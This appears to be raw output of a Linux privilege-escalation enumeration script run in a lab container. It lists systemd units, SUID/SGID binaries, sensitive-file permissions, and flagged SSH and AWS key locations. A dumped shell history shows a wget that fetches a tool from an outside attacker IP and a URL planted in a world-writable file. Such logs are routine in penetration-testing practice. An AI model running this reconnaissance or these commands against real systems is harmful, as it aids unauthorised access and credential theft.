-rw-r--r-- 1 root root  156 May 28  2019 apt-daily.timer
-rw-r--r-- 1 root root  919 Feb 14  2019 basic.target
-rw-r--r-- 1 root root  419 Feb 14  2019 bluetooth.target
-rw-r--r-- 1 root root  455 Feb 14  2019 boot-complete.target
-rw-r--r-- 1 root root  465 Feb 14  2019 cryptsetup-pre.target
-rw-r--r-- 1 root root  412 Feb 14  2019 cryptsetup.target
-rw-r--r-- 1 root root  750 Feb 14  2019 dev-hugepages.mount
-rw-r--r-- 1 root root  665 Feb 14  2019 dev-mqueue.mount
-rw-r--r-- 1 root root  471 Feb 14  2019 emergency.target
-rw-r--r-- 1 root root  541 Feb 14  2019 exit.target
-rw-r--r-- 1 root root  480 Feb 14  2019 final.target
-rw-r--r-- 1 root root  506 Feb 14  2019 getty-pre.target
-rw-r--r-- 1 root root  500 Feb 14  2019 getty.target
-rw-r--r-- 1 root root  598 Feb 14  2019 graphical.target
-rw-r--r-- 1 root root  527 Feb 14  2019 halt.target
-rw-r--r-- 1 root root  509 Feb 14  2019 hibernate.target
-rw-r--r-- 1 root root  530 Feb 14  2019 hybrid-sleep.target
-rw-r--r-- 1 root root  593 Feb 14  2019 initrd-fs.target
-rw-r--r-- 1 root root  561 Feb 14  2019 initrd-root-device.target
-rw-r--r-- 1 root root  566 Feb 14  2019 initrd-root-fs.target
-rw-r--r-- 1 root root  777 Feb 14  2019 initrd-switch-root.target
-rw-r--r-- 1 root root  763 Feb 14  2019 initrd.target
-rw-r--r-- 1 root root  541 Feb 14  2019 kexec.target
-rw-r--r-- 1 root root  435 Feb 14  2019 local-fs-pre.target
-rw-r--r-- 1 root root  547 Feb 14  2019 local-fs.target
-rw-r--r-- 1 root root  445 Feb 14  2019 machine.slice
-rw-r--r-- 1 root root  532 Feb 14  2019 multi-user.target
-rw-r--r-- 1 root root  505 Feb 14  2019 network-online.target
-rw-r--r-- 1 root root  502 Feb 14  2019 network-pre.target
-rw-r--r-- 1 root root  521 Feb 14  2019 network.target
-rw-r--r-- 1 root root  554 Feb 14  2019 nss-lookup.target
-rw-r--r-- 1 root root  513 Feb 14  2019 nss-user-lookup.target
-rw-r--r-- 1 root root  394 Feb 14  2019 paths.target
-rw-r--r-- 1 root root  592 Feb 14  2019 poweroff.target
-rw-r--r-- 1 root root  417 Feb 14  2019 printer.target
-rw-r--r-- 1 root root  745 Feb 14  2019 proc-sys-fs-binfmt_misc.automount
-rw-r--r-- 1 root root  655 Feb 14  2019 proc-sys-fs-binfmt_misc.mount
-rw-r--r-- 1 root root  583 Feb 14  2019 reboot.target
-rw-r--r-- 1 root root  549 Feb 14  2019 remote-cryptsetup.target
-rw-r--r-- 1 root root  436 Feb 14  2019 remote-fs-pre.target
-rw-r--r-- 1 root root  522 Feb 14  2019 remote-fs.target
-rw-r--r-- 1 root root  492 Feb 14  2019 rescue.target
-rw-r--r-- 1 root root  540 Feb 14  2019 rpcbind.target
-rw-r--r-- 1 root root  442 Feb 14  2019 shutdown.target
-rw-r--r-- 1 root root  402 Feb 14  2019 sigpwr.target
-rw-r--r-- 1 root root  460 Feb 14  2019 sleep.target
-rw-r--r-- 1 root root  449 Feb 14  2019 slices.target
-rw-r--r-- 1 root root  420 Feb 14  2019 smartcard.target
-rw-r--r-- 1 root root  396 Feb 14  2019 sockets.target
-rw-r--r-- 1 root root  420 Feb 14  2019 sound.target
-rw-r--r-- 1 root root  577 Feb 14  2019 suspend-then-hibernate.target
-rw-r--r-- 1 root root  503 Feb 14  2019 suspend.target
-rw-r--r-- 1 root root  393 Feb 14  2019 swap.target
-rw-r--r-- 1 root root  795 Feb 14  2019 sys-fs-fuse-connections.mount
-rw-r--r-- 1 root root  767 Feb 14  2019 sys-kernel-config.mount
-rw-r--r-- 1 root root  710 Feb 14  2019 sys-kernel-debug.mount
-rw-r--r-- 1 root root  558 Feb 14  2019 sysinit.target
-rw-r--r-- 1 root root 1.4K Feb 14  2019 syslog.socket
-rw-r--r-- 1 root root 1.4K Feb 14  2019 system-update-cleanup.service
-rw-r--r-- 1 root root  543 Feb 14  2019 system-update-pre.target
-rw-r--r-- 1 root root  617 Feb 14  2019 system-update.target
-rw-r--r-- 1 root root  722 Feb 14  2019 systemd-ask-password-console.path
-rw-r--r-- 1 root root  650 Feb 14  2019 systemd-ask-password-wall.path
-rw-r--r-- 1 root root  556 Feb 14  2019 systemd-exit.service
-rw-r--r-- 1 root root  546 Feb 14  2019 systemd-initctl.socket
-rw-r--r-- 1 root root  647 Feb 14  2019 systemd-journald-audit.socket
-rw-r--r-- 1 root root 1.2K Feb 14  2019 systemd-journald-dev-log.socket
-rw-r--r-- 1 root root  882 Feb 14  2019 systemd-journald.socket
-rw-r--r-- 1 root root  631 Feb 14  2019 systemd-networkd.socket
-rw-r--r-- 1 root root  556 Feb 14  2019 systemd-poweroff.service
-rw-r--r-- 1 root root  551 Feb 14  2019 systemd-reboot.service
-rw-r--r-- 1 root root  726 Feb 14  2019 systemd-rfkill.socket
-rw-r--r-- 1 root root  490 Feb 14  2019 systemd-tmpfiles-clean.timer
-rw-r--r-- 1 root root  435 Feb 14  2019 time-sync.target
-rw-r--r-- 1 root root  445 Feb 14  2019 timers.target
-rw-r--r-- 1 root root  457 Feb 14  2019 umount.target
-rw-r--r-- 1 root root  432 Feb 14  2019 user.slice
-rw-r--r-- 1 root root  151 Jan 10  2019 fstrim.service
-rw-r--r-- 1 root root  170 Jan 10  2019 fstrim.timer

/lib/systemd/system/multi-user.target.wants:
total 0
lrwxrwxrwx 1 root root 15 Jan 29 18:07 getty.target -> ../getty.target
lrwxrwxrwx 1 root root 33 Jan 29 18:07 systemd-ask-password-wall.path -> ../systemd-ask-password-wall.path
lrwxrwxrwx 1 root root 25 Jan 29 18:07 systemd-logind.service -> ../systemd-logind.service
lrwxrwxrwx 1 root root 39 Jan 29 18:07 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service
lrwxrwxrwx 1 root root 32 Jan 29 18:07 systemd-user-sessions.service -> ../systemd-user-sessions.service
lrwxrwxrwx 1 root root 15 Jun  9  2019 dbus.service -> ../dbus.service

/lib/systemd/system/sockets.target.wants:
total 0
lrwxrwxrwx 1 root root 25 Jan 29 18:07 systemd-initctl.socket -> ../systemd-initctl.socket
lrwxrwxrwx 1 root root 32 Jan 29 18:07 systemd-journald-audit.socket -> ../systemd-journald-audit.socket
lrwxrwxrwx 1 root root 34 Jan 29 18:07 systemd-journald-dev-log.socket -> ../systemd-journald-dev-log.socket
lrwxrwxrwx 1 root root 26 Jan 29 18:07 systemd-journald.socket -> ../systemd-journald.socket
lrwxrwxrwx 1 root root 14 Jun  9  2019 dbus.socket -> ../dbus.socket

/lib/systemd/system/getty.target.wants:
total 0
lrwxrwxrwx 1 root root 23 Jan 29 18:07 getty-static.service -> ../getty-static.service

/lib/systemd/system/graphical.target.wants:
total 0
lrwxrwxrwx 1 root root 39 Jan 29 18:07 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service

/lib/systemd/system/local-fs.target.wants:
total 0
lrwxrwxrwx 1 root root 29 Jan 29 18:07 systemd-remount-fs.service -> ../systemd-remount-fs.service

/lib/systemd/system/rc-local.service.d:
total 4.0K
-rw-r--r-- 1 root root 290 Jan 29 18:07 debian.conf

/lib/systemd/system/rescue.target.wants:
total 0
lrwxrwxrwx 1 root root 39 Jan 29 18:07 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service

/lib/systemd/system/sysinit.target.wants:
total 0
lrwxrwxrwx 1 root root 20 Jan 29 18:07 cryptsetup.target -> ../cryptsetup.target
lrwxrwxrwx 1 root root 22 Jan 29 18:07 dev-hugepages.mount -> ../dev-hugepages.mount
lrwxrwxrwx 1 root root 19 Jan 29 18:07 dev-mqueue.mount -> ../dev-mqueue.mount
lrwxrwxrwx 1 root root 28 Jan 29 18:07 kmod-static-nodes.service -> ../kmod-static-nodes.service
lrwxrwxrwx 1 root root 36 Jan 29 18:07 proc-sys-fs-binfmt_misc.automount -> ../proc-sys-fs-binfmt_misc.automount
lrwxrwxrwx 1 root root 32 Jan 29 18:07 sys-fs-fuse-connections.mount -> ../sys-fs-fuse-connections.mount
lrwxrwxrwx 1 root root 26 Jan 29 18:07 sys-kernel-config.mount -> ../sys-kernel-config.mount
lrwxrwxrwx 1 root root 25 Jan 29 18:07 sys-kernel-debug.mount -> ../sys-kernel-debug.mount
lrwxrwxrwx 1 root root 36 Jan 29 18:07 systemd-ask-password-console.path -> ../systemd-ask-password-console.path
lrwxrwxrwx 1 root root 25 Jan 29 18:07 systemd-binfmt.service -> ../systemd-binfmt.service
lrwxrwxrwx 1 root root 32 Jan 29 18:07 systemd-journal-flush.service -> ../systemd-journal-flush.service
lrwxrwxrwx 1 root root 27 Jan 29 18:07 systemd-journald.service -> ../systemd-journald.service
lrwxrwxrwx 1 root root 36 Jan 29 18:07 systemd-machine-id-commit.service -> ../systemd-machine-id-commit.service
lrwxrwxrwx 1 root root 31 Jan 29 18:07 systemd-modules-load.service -> ../systemd-modules-load.service
lrwxrwxrwx 1 root root 30 Jan 29 18:07 systemd-random-seed.service -> ../systemd-random-seed.service
lrwxrwxrwx 1 root root 25 Jan 29 18:07 systemd-sysctl.service -> ../systemd-sysctl.service
lrwxrwxrwx 1 root root 27 Jan 29 18:07 systemd-sysusers.service -> ../systemd-sysusers.service
lrwxrwxrwx 1 root root 37 Jan 29 18:07 systemd-tmpfiles-setup-dev.service -> ../systemd-tmpfiles-setup-dev.service
lrwxrwxrwx 1 root root 33 Jan 29 18:07 systemd-tmpfiles-setup.service -> ../systemd-tmpfiles-setup.service
lrwxrwxrwx 1 root root 30 Jan 29 18:07 systemd-update-utmp.service -> ../systemd-update-utmp.service

/lib/systemd/system/systemd-resolved.service.d:
total 4.0K
-rw-r--r-- 1 root root 551 Jan 29 18:07 resolvconf.conf

/lib/systemd/system/systemd-timesyncd.service.d:
total 4.0K
-rw-r--r-- 1 root root 251 Jan 29 18:07 disable-with-time-daemon.conf

/lib/systemd/system/timers.target.wants:
total 0
lrwxrwxrwx 1 root root 31 Jan 29 18:07 systemd-tmpfiles-clean.timer -> ../systemd-tmpfiles-clean.timer

/lib/systemd/system/user-.slice.d:
total 4.0K
-rw-r--r-- 1 root root 486 Feb 14  2019 10-defaults.conf

/lib/systemd/system/runlevel1.target.wants:
total 0

/lib/systemd/system/runlevel2.target.wants:
total 0

/lib/systemd/system/runlevel3.target.wants:
total 0

/lib/systemd/system/runlevel4.target.wants:
total 0

/lib/systemd/system/runlevel5.target.wants:
total 0

/lib/systemd/network:
total 12K
-rw-r--r-- 1 root root 645 Feb 14  2019 80-container-host0.network
-rw-r--r-- 1 root root 718 Feb 14  2019 80-container-ve.network
-rw-r--r-- 1 root root 704 Feb 14  2019 80-container-vz.network

/lib/systemd/system-generators:
total 268K
-rwxr-xr-x 1 root root 14K Jan 29 18:07 systemd-bless-boot-generator
-rwxr-xr-x 1 root root 31K Jan 29 18:07 systemd-cryptsetup-generator
-rwxr-xr-x 1 root root 15K Jan 29 18:07 systemd-debug-generator
-rwxr-xr-x 1 root root 39K Jan 29 18:07 systemd-fstab-generator
-rwxr-xr-x 1 root root 14K Jan 29 18:07 systemd-getty-generator
-rwxr-xr-x 1 root root 30K Jan 29 18:07 systemd-gpt-auto-generator
-rwxr-xr-x 1 root root 15K Jan 29 18:07 systemd-hibernate-resume-generator
-rwxr-xr-x 1 root root 14K Jan 29 18:07 systemd-rc-local-generator
-rwxr-xr-x 1 root root 15K Jan 29 18:07 systemd-run-generator
-rwxr-xr-x 1 root root 14K Jan 29 18:07 systemd-system-update-generator
-rwxr-xr-x 1 root root 35K Jan 29 18:07 systemd-sysv-generator
-rwxr-xr-x 1 root root 15K Jan 29 18:07 systemd-veritysetup-generator

/lib/systemd/system-preset:
total 4.0K
-rw-r--r-- 1 root root 951 Feb 14  2019 90-systemd.preset

/lib/systemd/system-shutdown:
total 0

/lib/systemd/system-sleep:
total 0


[00;33m### SOFTWARE #############################################[00m
[00;31m[-] www home dir contents:[00m
/var/www/:
total 16K
drwxr-xr-x 3 root root 4.0K Feb 11 17:36 .
drwxr-xr-x 1 root root 4.0K Feb 11 17:36 ..
drwxr-xr-x 2 root root 4.0K Feb 11 17:36 html

/var/www/html:
total 12K
drwxr-xr-x 2 root root 4.0K Feb 11 17:36 .
drwxr-xr-x 3 root root 4.0K Feb 11 17:36 ..
-rw-r--r-- 1 root root  612 Feb 11 17:36 index.nginx-debian.html


[00;33m### INTERESTING FILES ####################################[00m
[00;31m[-] Useful file locations:[00m
/usr/bin/gcc


[00;31m[-] Installed compilers:[00m
ii  g++                              4:8.3.0-1                 amd64        GNU C++ compiler
ii  g++-8                            8.3.0-6                   amd64        GNU C++ compiler
ii  gcc                              4:8.3.0-1                 amd64        GNU C compiler
ii  gcc-8                            8.3.0-6                   amd64        GNU C compiler


[00;31m[-] Can we read/write sensitive files:[00m
-rw-r--r-- 1 root root 1319 Feb 11 17:37 /etc/passwd
-rw-r--r-- 1 root root 580 Feb 11 17:37 /etc/group
-rw-r--r-- 1 root root 767 Mar  4  2016 /etc/profile
-rw-r----- 1 root shadow 696 Feb 11 17:37 /etc/shadow


[00;31m[-] SUID files:[00m
-rwsr-xr-x 1 root root 436552 Jan 31 20:55 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 51184 Jun  9  2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 63736 Jul 27  2018 /usr/bin/passwd
-rwsr-xr-x 1 root root 44528 Jul 27  2018 /usr/bin/chsh
-rwsr-xr-x 1 root root 54096 Jul 27  2018 /usr/bin/chfn
-rwsr-xr-x 1 root root 84016 Jul 27  2018 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 44440 Jul 27  2018 /usr/bin/newgrp
-rwsr-xr-x 1 root root 63568 Jan 10  2019 /bin/su
-rwsr-xr-x 1 root root 34888 Jan 10  2019 /bin/umount
-rwsr-xr-x 1 root root 51280 Jan 10  2019 /bin/mount


[00;31m[-] SGID files:[00m
-rwxr-sr-x 1 root shadow 31000 Jul 27  2018 /usr/bin/expiry
-rwxr-sr-x 1 root shadow 71816 Jul 27  2018 /usr/bin/chage
-rwxr-sr-x 1 root tty 34896 Jan 10  2019 /usr/bin/wall
-rwxr-sr-x 1 root ssh 321672 Jan 31 20:55 /usr/bin/ssh-agent
-rwxr-sr-x 1 root shadow 39616 Feb 14  2019 /sbin/unix_chkpwd


[00;33m[+] Private SSH keys found!:[00m
/home/qtc/le.sh


[00;33m[+] AWS secret keys found!:[00m
/home/qtc/le.sh


[00;31m[-] World-writable files (excluding /proc and /sys):[00m
srw-rw-rw- 1 root root 0 May  1 04:31 /run/dbus/system_bus_socket
-rw-rw-rw- 1 root root 0 May  2 04:53 /code/urls.txt


[00;31m[-] NFS displaying partitions and filesystems - you need to check if exotic filesystems[00m
# UNCONFIGURED FSTAB FOR BASE SYSTEM


[-] Can't search *.conf files as no keyword was entered

[-] Can't search *.php files as no keyword was entered

[-] Can't search *.log files as no keyword was entered

[-] Can't search *.ini files as no keyword was entered

[00;31m[-] All *.conf files in /etc (recursive 1 level):[00m
-rw-r--r-- 1 root root 510 Feb 11 17:37 /etc/nsswitch.conf
-rw-r--r-- 1 root root 2969 Feb 26  2019 /etc/debconf.conf
-rw-r--r-- 1 root root 2981 Jan 30 00:00 /etc/adduser.conf
-rw-r--r-- 1 root root 2584 Aug  1  2018 /etc/gai.conf
-rw-r--r-- 1 root root 812 Sep 25  2019 /etc/mke2fs.conf
-rw-r--r-- 1 root root 552 Feb 14  2019 /etc/pam.conf
-rw-r--r-- 1 root root 642 Mar  1  2019 /etc/xattr.conf
-rw-r--r-- 1 root root 34 Mar  2  2018 /etc/ld.so.conf
-rw-r--r-- 1 root root 9 Aug  7  2006 /etc/host.conf
-rw-r--r-- 1 root root 604 Jun 26  2016 /etc/deluser.conf
-rw-r--r-- 1 root root 38 May  1 04:31 /etc/resolv.conf
-rw-r--r-- 1 root root 191 Apr 25  2019 /etc/libaudit.conf
-rw-r--r-- 1 root root 1260 Dec 14  2018 /etc/ucf.conf
-rw-r--r-- 1 root root 2351 May 31  2018 /etc/sysctl.conf
-rw-r--r-- 1 root root 5713 Feb  2 08:39 /etc/ca-certificates.conf


[00;31m[-] Current user's history files:[00m
-rw------- 1 qtc qtc 167 May  1 21:06 /home/qtc/.bash_history


[00;31m[-] Location and contents (if accessible) of .bash_history file(s):[00m
/home/qtc/.bash_history
clear
l
cd /
ls
l
ls -la
wget http://10.10.14.39/tools/lse.sh
clear
l
ls -la
cd /code
ls
echo 'http://10.10.14.39/test' > urls.txt 
cd ~
ls -la
cat .bashrc
vi .bashrc


[00;31m[-] Any interesting mail in /var/mail:[00m
total 12
drwxrwsr-x 2 root mail 4096 Jan 30 00:00 .
drwxr-xr-x 1 root root 4096 Feb 11 17:36 ..


[00;33m[+] Looks like we're in a Docker container:[00m
11:cpuset:/docker/aeb4525789d86f2cda1dd10ae3bd96dba317e4f0784fdba2a86943f0486a4c3b
10:freezer:/docker/aeb4525789d86f2cda1dd10ae3bd96dba317e4f0784fdba2a86943f0486a4c3b
9:blkio:/docker/aeb4525789d86f2cda1dd10ae3bd96dba317e4f0784fdba2a86943f0486a4c3b
7:net_cls,net_prio:/docker/aeb4525789d86f2cda1dd10ae3bd96dba317e4f0784fdba2a86943f0486a4c3b
6:memory:/docker/aeb4525789d86f2cda1dd10ae3bd96dba317e4f0784fdba2a86943f0486a4c3b
5:cpu,cpuacct:/docker/aeb4525789d86f2cda1dd10ae3bd96dba317e4f0784fdba2a86943f0486a4c3b
4:devices:/docker/aeb4525789d86f2cda1dd10ae3bd96dba317e4f0784fdba2a86943f0486a4c3b
3:pids:/docker/aeb4525789d86f2cda1dd10ae3bd96dba317e4f0784fdba2a86943f0486a4c3b
2:perf_event:/docker/aeb4525789d86f2cda1dd10ae3bd96dba317e4f0784fdba2a86943f0486a4c3b
1:name=systemd:/docker/aeb4525789d86f2cda1dd10ae3bd96dba317e4f0784fdba2a86943f0486a4c3b
-rwxr-xr-x 1 root root 0 Feb 25 12:33 /.dockerenv


[00;31m[-] Anything juicy in the Dockerfile:[00m
-rw-r--r-- 1 root root 1072 Feb 11 17:34 /code/Dockerfile


[00;33m### SCAN COMPLETE ####################################[00m
